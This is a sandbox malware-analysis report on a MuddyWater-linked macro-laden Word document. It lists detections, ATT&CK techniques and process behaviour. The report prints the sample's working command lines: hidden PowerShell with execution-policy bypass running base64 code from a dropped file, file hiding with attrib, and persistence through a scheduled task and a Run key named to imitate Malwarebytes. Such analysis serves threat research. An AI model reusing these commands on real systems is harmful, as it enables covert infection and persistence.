d15aee026074fbd18f780fb51ec0632a.doc
This report is generated from a file or URL submitted to this webservice on December 8th 2018 15:20:25 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v8.20 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware
- Hooks API calls
- Persistence
-
Schedules a task to be executed at a specific time and date
Spawns a lot of processes - Evasive
- Found a reference to a WMI query string known to be used for VM detection
MITRE ATT&CK™ Techniques Detection
Additional Context
OSINT
- External References
- https://sec0wn.blogspot.com/2018/02/burping-on-muddywater.html
- External User Tags
- #fireeye #iran #macros #malware #muddywater #powerstats #temp.zagros #vbs
Related Sandbox Artifacts
- Associated SHA256s
- 3ea10f999e000036a36cb5adcc94658f133f339070e7daeebb65dfd4b58d1398
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 9
-
External Systems
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 39/59 Antivirus vendors marked sample as malicious (66% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
-
5/14 Antivirus vendors marked sample as malicious (35% detection rate)
39/59 Antivirus vendors marked sample as malicious (66% detection rate) - source
- External System
- relevance
- 8/10
-
Sample was identified as malicious by a large number of Antivirus engines
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
Document spawns new processes
-
Installation/Persistance
-
Schedules a task to be executed at a specific time and date
- details
- Process "schtasks.exe" with commandline "/Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareByteSDK /TR "wscript %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs" /F" (Show Process)
- source
- Monitored Target
- relevance
- 8/10
- ATT&CK ID
- T1168 (Show technique in the MITRE ATT&CK™ matrix)
-
Writes data to a remote process
- details
-
"WINWORD.EXE" wrote 32 bytes to a remote process "%WINDIR%\System32\wscript.exe" (Handle: 1636)
"WINWORD.EXE" wrote 52 bytes to a remote process "C:\Windows\System32\wscript.exe" (Handle: 1636)
"WINWORD.EXE" wrote 8 bytes to a remote process "C:\Windows\System32\wscript.exe" (Handle: 1636)
"wscript.exe" wrote 32 bytes to a remote process "C:\Windows\System32\mshta.exe" (Handle: 764)
"wscript.exe" wrote 52 bytes to a remote process "C:\Windows\System32\mshta.exe" (Handle: 764)
"wscript.exe" wrote 8 bytes to a remote process "C:\Windows\System32\mshta.exe" (Handle: 764)
"mshta.exe" wrote 32 bytes to a remote process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 800)
"mshta.exe" wrote 52 bytes to a remote process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 800)
"mshta.exe" wrote 8 bytes to a remote process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 800)
"powershell.exe" wrote 32 bytes to a remote process "C:\Windows\System32\attrib.exe" (Handle: 820)
"powershell.exe" wrote 52 bytes to a remote process "C:\Windows\System32\attrib.exe" (Handle: 820)
"powershell.exe" wrote 8 bytes to a remote process "C:\Windows\System32\attrib.exe" (Handle: 820)
"powershell.exe" wrote 32 bytes to a remote process "C:\Windows\System32\attrib.exe" (Handle: 1384)
"powershell.exe" wrote 52 bytes to a remote process "C:\Windows\System32\attrib.exe" (Handle: 1384)
"powershell.exe" wrote 8 bytes to a remote process "C:\Windows\System32\attrib.exe" (Handle: 1384)
"powershell.exe" wrote 32 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 820)
"powershell.exe" wrote 52 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 820)
"powershell.exe" wrote 8 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 820) - source
- API Call
- relevance
- 6/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Schedules a task to be executed at a specific time and date
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
-
Found keyword "\w+_(?:GotFocus|LostFocus|MouseHover)" which indicates: "Runs when the file is opened and ActiveX objects trigger events"
Found keyword "Document_Open" which indicates: "Runs when the Word or Publisher document is opened" - source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1137 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\d15aee026074fbd18f780fb51ec0632a.doc"" (Show Process)
Spawned process "wscript.exe" with commandline ""%ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs"" (Show Process)
Spawned process "mshta.exe" with commandline "vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))));""
0 "))" (Show Process)
Spawned process "powershell.exe" with commandline "-w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))));" (Show Process)
Spawned process "attrib.exe" with commandline "+s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs" (Show Process)
Spawned process "attrib.exe" with commandline "+s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini" (Show Process)
Spawned process "schtasks.exe" with commandline "/Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareByteSDK /TR "wscript %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs" /F" (Show Process)
Spawned process "Setup.exe" with commandline "-Embedding" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 2 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 16
-
Anti-Reverse Engineering
-
Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
- details
- "powershell.exe" is allocating memory with PAGE_GUARD access rights
- source
- API Call
- relevance
- 10/10
-
Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
-
Environment Awareness
-
Contains ability to measure performance
- details
- rdtsc from Setup.exe (PID: 2948) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Found a reference to a WMI query string known to be used for VM detection
- details
-
"private const x_HelpAlias_012_0_Message = " winrm get http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Service?Name=WinRM"" (Indicator: "win32_service"; File: "ConfManagerNT.vbs")
"private const X_HelpAlias_015_0_Message = " winrm get wmicimv2/Win32_Service?Name=WinRM"" (Indicator: "win32_service"; File: "ConfManagerNT.vbs") - source
- File/Memory
- relevance
- 10/10
- ATT&CK ID
- T1047 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to measure performance
-
General
-
Found a potential E-Mail address in binary/memory
- details
-
Pattern match: "qddgcbkr@a.jdzw"
Pattern match: "a@2.oww"
Pattern match: "_a3q@443..8"
Pattern match: "ylh@f2p.s331q"
Pattern match: "zk@fx.e"
Pattern match: "m@phbwlq-.dtw"
Pattern match: "t@sd8r.wn"
Pattern match: "4dlx@y.b" - source
- File/Memory
- relevance
- 3/10
- ATT&CK ID
- T1114 (Show technique in the MITRE ATT&CK™ matrix)
-
Opened the service control manager
- details
-
"WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"Setup.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1) - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1035 (Show technique in the MITRE ATT&CK™ matrix)
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "US/")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "2Y/")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "0Q/")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Found a potential E-Mail address in binary/memory
-
Installation/Persistance
-
Creates new processes
- details
-
"WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\wscript.exe", Handle: 1636)
"wscript.exe" is creating a new process (Name: "%WINDIR%\System32\mshta.exe", Handle: )
"mshta.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 800) - source
- API Call
- relevance
- 8/10
-
Executes a visual basic script
- details
- Process "wscript.exe" with commandline ""%ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs"" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Loads the task scheduler COM API
- details
- "schtasks.exe" loaded module "%WINDIR%\System32\taskschd.dll" at FAF60000
- source
- Loaded Module
- relevance
- 5/10
- ATT&CK ID
- T1168 (Show technique in the MITRE ATT&CK™ matrix)
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
-
"WINWORD.EXE" opened "\Device\MountPointManager"
"mshta.exe" opened "\Device\MountPointManager" - source
- API Call
- relevance
- 5/10
-
Creates new processes
-
Ransomware/Banking
-
Contains calling to enable macros (often the case for malicious documents)
- details
- "Once you have enable editing, please click Enable Content from the yellow bar above" (Indicator: "enable content")
- source
- File/Memory
- relevance
- 8/10
-
Contains calling to enable macros (often the case for malicious documents)
-
System Security
-
Hooks API calls
- details
-
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies proxy settings
- details
-
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"mshta.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"mshta.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"Setup.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"Setup.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Hooks API calls
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "Open" which indicates: "May open a file"
Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "CreateTextFile" which indicates: "May create a text file" - source
- Static Parser
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "401347fdfe070000" to virtual address "0xFD48FE48" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "401347fdfe070000" to virtual address "0xFD48FB48" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "a01267f6fe070000" to virtual address "0xFFC81648" (part of module "WININET.DLL")
"WINWORD.EXE" wrote bytes "e913b0e4ff" to virtual address "0xFF0550C0" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "48b8101767f6fe070000ffe0" to virtual address "0xFD471000" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48b8e01367f6fe070000ffe0" to virtual address "0xFD471340" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "e94b9f2f01cccccccccc" to virtual address "0xFDBA6230" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "97e7663d018fd401" to virtual address "0xEE8F71C0" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "001047fdfe070000" to virtual address "0xFD48FE18" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "001047fdfe070000" to virtual address "0xFD48FB18" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "d0023aeafe070000" to virtual address "0xFF0BA558" (part of module "OLE32.DLL")
"WINWORD.EXE" wrote bytes "401347fdfe070000" to virtual address "0xFD48FE10" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "001047fdfe070000" to virtual address "0xFD48FE50" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "401347fdfe070000" to virtual address "0xFD48FB10" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "001047fdfe070000" to virtual address "0xFD48FB50" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48b8bc52fce9fe070000ffe0" to virtual address "0x777A9020" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "e9abc02f01cc" to virtual address "0xFDBA4060" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "00100000" to virtual address "0xFD488468" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "0ede663d018fd401" to virtual address "0xED62FA00" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "8f37cf3d018fd401" to virtual address "0xF4060160" (part of module "MSPTLS.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 1 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 23
-
Anti-Detection/Stealthyness
-
Possibly checks for the presence of an Antivirus engine
- details
- "MalwareByteSDK" (Indicator: "malwarebytes")
- source
- File/Memory
- relevance
- 3/10
- ATT&CK ID
- T1063 (Show technique in the MITRE ATT&CK™ matrix)
-
Possibly checks for the presence of an Antivirus engine
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
-
SetUnhandledExceptionFilter@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
Environment Awareness
-
Contains ability to query machine time
- details
-
GetSystemTime@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetSystemTime@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetLocalTime@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
- ATT&CK ID
- T1124 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to query the machine timezone
- details
- GetTimeZoneInformation@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
- ATT&CK ID
- T1124 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to query the machine version
- details
-
GetVersion@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetVersionExW@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetVersionExW@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetVersion@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetVersionExW@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetVersionExW@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetVersion@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetVersionExA@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetVersionExA@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetVersionExA@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetVersionExW@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the system locale
- details
-
EnumSystemLocalesW@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetUserDefaultUILanguage@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetUserDefaultLCID@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query volume size
- details
- GetDiskFreeSpaceExW@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 3/10
- ATT&CK ID
- T1083 (Show technique in the MITRE ATT&CK™ matrix)
-
Makes a code branch decision directly after an API that is environment aware
- details
-
Found API call GetVersion@KERNEL32.DLL directly followed by "cmp eax, 80000000h" and "jnc 3FBCA3FEh" from Setup.exe (PID: 2948) (Show Stream)
Found API call GetVersionExW@KERNEL32.DLL directly followed by "cmp eax, esp" and "je 3FBD3789h" from Setup.exe (PID: 2948) (Show Stream)
Found API call GetVersion@KERNEL32.DLL directly followed by "cmp eax, 80000000h" and "jnc 3FBCA285h" from Setup.exe (PID: 2948) (Show Stream)
Found API call GetVersionExW@KERNEL32.DLL directly followed by "cmp eax, ebx" and "je 3FBC2B95h" from Setup.exe (PID: 2948) (Show Stream)
Found API call GetVersionExW@KERNEL32.DLL directly followed by "cmp eax, ecx" and "jne 3FBD3871h" from Setup.exe (PID: 2948) (Show Stream)
Found API call GetVersion@KERNEL32.DLL directly followed by "cmp eax, 80000000h" and "jnc 3FBCA1B1h" from Setup.exe (PID: 2948) (Show Stream)
Found API call GetVersionExA@KERNEL32.DLL directly followed by "cmp eax, ebx" and "je 3FBD444Ah" from Setup.exe (PID: 2948) (Show Stream)
Found API call GetSystemTimeAsFileTime@KERNEL32.DLL directly followed by "cmp dword ptr [rsp+34h], ebx" and "ret " from Setup.exe (PID: 2948) (Show Stream)
Found API call GetSystemTimeAsFileTime@KERNEL32.DLL directly followed by "cmp dword ptr [000000003FCB8808h], 00000000h" and "jne 3FBEA24Eh" from Setup.exe (PID: 2948) (Show Stream)
Found API call GetSystemTimeAsFileTime@KERNEL32.DLL directly followed by "cmp eax, ebp" and "jnle 3FBE917Bh" from Setup.exe (PID: 2948) (Show Stream)
Found API call GetVersionExA@KERNEL32.DLL directly followed by "cmp eax, edi" and "je 3FBF0870h" from Setup.exe (PID: 2948) (Show Stream)
Found API call GetLocalTime@KERNEL32.DLL directly followed by "cmp dword ptr [rsp+20h], ebx" and "jnbe 3FBE7EDCh" from Setup.exe (PID: 2948) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Possibly tries to detect the presence of a debugger
- details
-
GetProcessHeap@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetProcessHeap@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetProcessHeap@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetProcessHeap@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetProcessHeap@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetProcessHeap@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetProcessHeap@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetProcessHeap@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream)
GetProcessHeap@KERNEL32.DLL from Setup.exe (PID: 2948) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query machine time
-
General
-
Contains embedded VBA macros
- details
- details too long to display
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros (normalized)
- details
-
Normalized macro string: "http"
Normalized macro string: "KHyl.dataType"
Normalized macro string: "UllMYwoKUHJpdmF0ZSBGdW5jdGlvbiBHZXRFbGVtZW50QXR0cmlidXRlQnlYcGF0aChtc3htbE9iaiwgeHBhdGgsIGF0dHJpYnV0" - source
- File/Memory
- relevance
- 10/10
- ATT&CK ID
- T1137 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF4325768A8A3ACF89.TMP"
"WINWORD.EXE" created file "%TEMP%\Word8.0\MSForms.exd"
"Setup.exe" created file "%TEMP%\Setup00000b84\OSETUP.DLL"
"Setup.exe" created file "%TEMP%\SetupExe(20181208163200B84).log"
"Setup.exe" created file "%TEMP%\Setup00000b84\OSETUPUI.DLL"
"Setup.exe" created file "%TEMP%\Setup00000b84\BRANDING.XML"
"Setup.exe" created file "%TEMP%\Setup00000b84\SETUP.CHM"
"Setup.exe" created file "%TEMP%\GimmeSetup(20181208163340B84).log" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACBPIDS_S-1-5-5-0-56564"
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACB10_S-1-5-5-0-56564"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001"
"\Sessions\1\BaseNamedObjects\!IECompat!Mutex"
"\Sessions\1\BaseNamedObjects\_SHuassist.mtx"
"\Sessions\1\BaseNamedObjects\Global\_MSIExecute"
"\Sessions\1\BaseNamedObjects\pidKeyValidationMutex" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~_5aee026074fbd18f780fb51ec0632a.doc" as clean (type is "data")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
-
"WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE14\RICHED20.DLL" at E5610000
"Setup.exe" loaded module "%WINDIR%\System32\riched20.dll" at F3A30000 - source
- Loaded Module
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at E0740000
- source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "wscript.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.C8C="4""
Process "wscript.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "wscript.exe" (Show Process) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432"
Process "powershell.exe" (Show Process) was launched with modified environment variables: "MEOW"
Process "attrib.exe" (Show Process) was launched with new environment variables: "PSExecutionPolicyPreference="Bypass""
Process "attrib.exe" (Show Process) was launched with modified environment variables: "PSModulePath"
Process "Setup.exe" (Show Process) was launched with modified environment variables: "MEOW, PSModulePath"
Process "Setup.exe" (Show Process) was launched with missing environment variables: "PSExecutionPolicyPreference" - source
- Monitored Target
- relevance
- 10/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
"WINWORD.EXE" searching for class "mspim_wnd32" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1010 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
-
Spawned process "wscript.exe" with commandline ""%ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs"" (Show Process)
Spawned process "mshta.exe" with commandline "vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run""pow ..." (Show Process), Spawned process "powershell.exe" with commandline "-w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encodin ..." (UID: 00008857-00003784, Additional Context: "[System.Text.Encoding]::Unicode.GetString(FromBase64String((getontent %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))); \{^ -DE#8R &LC7 >#yBwjvzS[System.Text.Encoding]::Unicode.GetString(FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini)))"), Spawned process "attrib.exe" with commandline "+s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs" (Show Process), Spawned process "attrib.exe" with commandline "+s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini" (Show Process), Spawned process "schtasks.exe" with commandline "/Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareByteS ..." (Show Process), Spawned process "Setup.exe" with commandline "-Embedding" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contains embedded VBA macros
-
Installation/Persistance
-
Dropped files
- details
-
"ConfManagerNT.vbs" has type "Little-endian UTF-16 Unicode text with very long lines"
"~_5aee026074fbd18f780fb51ec0632a.doc" has type "data"
"d15aee026074fbd18f780fb51ec0632a.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Sat Dec 8 13:20:27 2018 mtime=Sat Dec 8 13:20:27 2018 atime=Sat Dec 8 13:20:36 2018 length=983040 window=hide"
"ProjectConfManagerNT.ini" has type "Little-endian UTF-16 Unicode text with very long lines with no line terminators"
"~WRS_12145297-CBEE-4101-BDC6-F8BD546DB9A4_.tmp" has type "data"
"BACF462D.wmf" has type "ms-windows metafont .wmf"
"10201FDC.wmf" has type "ms-windows metafont .wmf"
"index.dat" has type "data"
"17GPJA9KU9GW9OODB6Z0.temp" has type "data"
"~WRS_A3F12A40-44A8-4808-8AB8-97799042790C_.tmp" has type "data"
"SetupExe_20181208163200B84_.log" has type "ASCII text with CRLF line terminators"
"ExcludeDictionaryEN0409.lex" has type "Little-endian UTF-16 Unicode text with no line terminators"
"GimmeSetup_20181208163340B84_.log" has type "ASCII text with very long lines with CRLF line terminators"
"MSForms.exd" has type "data"
"~_Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Modifies auto-execute functionality by setting/creating a value in the registry
- details
-
"powershell.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"; Key: "MALWAREBYTESDK"; Value: "wscript %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs")
